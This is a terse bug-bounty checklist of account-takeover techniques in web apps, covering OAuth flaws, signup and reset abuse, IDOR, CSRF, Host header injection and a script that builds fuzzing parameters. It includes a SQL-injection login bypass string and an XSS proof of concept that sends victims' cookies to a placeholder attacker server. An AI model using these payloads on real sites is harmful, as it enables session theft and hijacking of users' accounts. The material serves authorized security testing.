params =open("Arjun/arjun/db/large.txt", "r").readlines()params =set(params)NewParams =set()for param in params: NewParams.add('"'+ param.strip() +'"'+":"+'"'+ param.strip() +'\'!@#$%^&*)(?><",')NewParamsFile =open("new-params", "w")for param in NewParams: NewParamsFile.write(param +"\n")
[ ] OAuth to Account takeover
OAuth to Account TakeoverRedirect_URI: Open redirect,XSS,LFIEmail Parameter: Check the request after confirming your email. If it contains the email parameter,try changing it to verify another account.CSRF: If the state parameter is not implemented or validated properly, it can lead to CSRF.Client Secret Exposure & Weak CryptographyLeaking Authorization Code or Token: Check for leaks in the Referer header.Access Token in Browser History: If it's in the URL, it can be exploited.No Expiration CodeSSRF: Via logo_uri, jwks_uri, sector_identifier_uri.
[ ] Pre-Account Takeover
A pre-account takeover occurs when an attacker creates a user account using one signup method, and the victim creates another account using a different signup method with the same email address. This can happen if the application fails to validate email addresses properly.
How to Hunt:1. Try registering any email address without verifying it.2. Try registering an account again, but this time with a different method (e.g.,"Sign up with Google") usingthe same email address.3. Since both accounts are linked, attempt to log inwith the specified password and username to see if you can access information from the Google-linked account.
[ ] Account takeover by utilizing sensitive data exposure
Sensitive data exposure occurs when a web application failed to properly protect confidential information, resulting in the disclosure of sensitive information or data about users, or anything related to them, to a third party.Occasionally, the application displays unnecessary data, such asvalidOTPs, hashes, or passwords, over the request and response parts. So it’s a good idea to pay attention to the response and request portions.
[ ] login
1. check if you are able to brute force the password2. Test for OAuth misconfigurations3. check if you are able to bruteforce the login OTP4. check for JWT mesconfigurations5. Test for SQL injection to bypass authentication ```admin" or 1=1;--```6. check if the application validates the OTP or Token if
[ ] XSS to Account Takeover
if the application does not use auth token or you can't access the cookies because the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password
1. try to exfiltrate the cookies
2. try to exfiltrate the Auth Token
3. if the cookie's "domain" attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies
- PoC Example:
```html
<script>
/*
this script will create a hidden <img> element
when the browser tries to load the image
the victim's cookies will be sent to your server
*/
var new_img = document.createElement('img');
new_img.src = "http://yourserver/" + document.cookie;
new_img.style = 'display: none;'
document.body.appendChild(new_img);
</script>
```
[ ] CSRF to Account Takeover
1. check if the email update endpoint is vulnerable to CSRF2. check if the password change endpoint is vulnerable to CSRF
[ ] IDOR to Account Takerover
1. checck if the email update endpoint is vulnerable to IDOR2. check if the password change endpoint is vulnerable to IDOR3. check if the password reset endpoint vulnerable to IDOR
[ ] Account takeover by Response & Status code Manipulation
[ ] Account takeover by exploiting Weak cryptography
check the cryptography algorthim in the token of reset password
[ ] Password or email change function
IF you try to change password and see email parameter in password change request, Try changing your email to victim email
[ ] Sing-Up Function
IF you try to sing-up new account in target site, in email filed try set target email
IF you try to sing-up new account in target site using 3rd party, in 3d party use phone number instead email then link 3rd account with target site.Then Go setting try link victim email in you account
[ ] Rest Token
Try to use your REST Token with Target account. Hint: email=Target@email.com&code=$Attacker_TOKEN$
Brute Force Rest Token if it is numeric. Hint : email=Target@email.com&code=$TOKEN$
Try to figure out how the token are generated: 1. Generated based on TimeStamp OR ID of user OR email of user
[ ] Host Header Injection
when send rest account request intercept POST Request and Change Host header value from target.site TO Attacker.com: Hint POST /PassRest HTTP1/1 Host: Attacker.com
[ ] CORS Misconfiguration to Account Takeover
If the page contains CORS missconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose: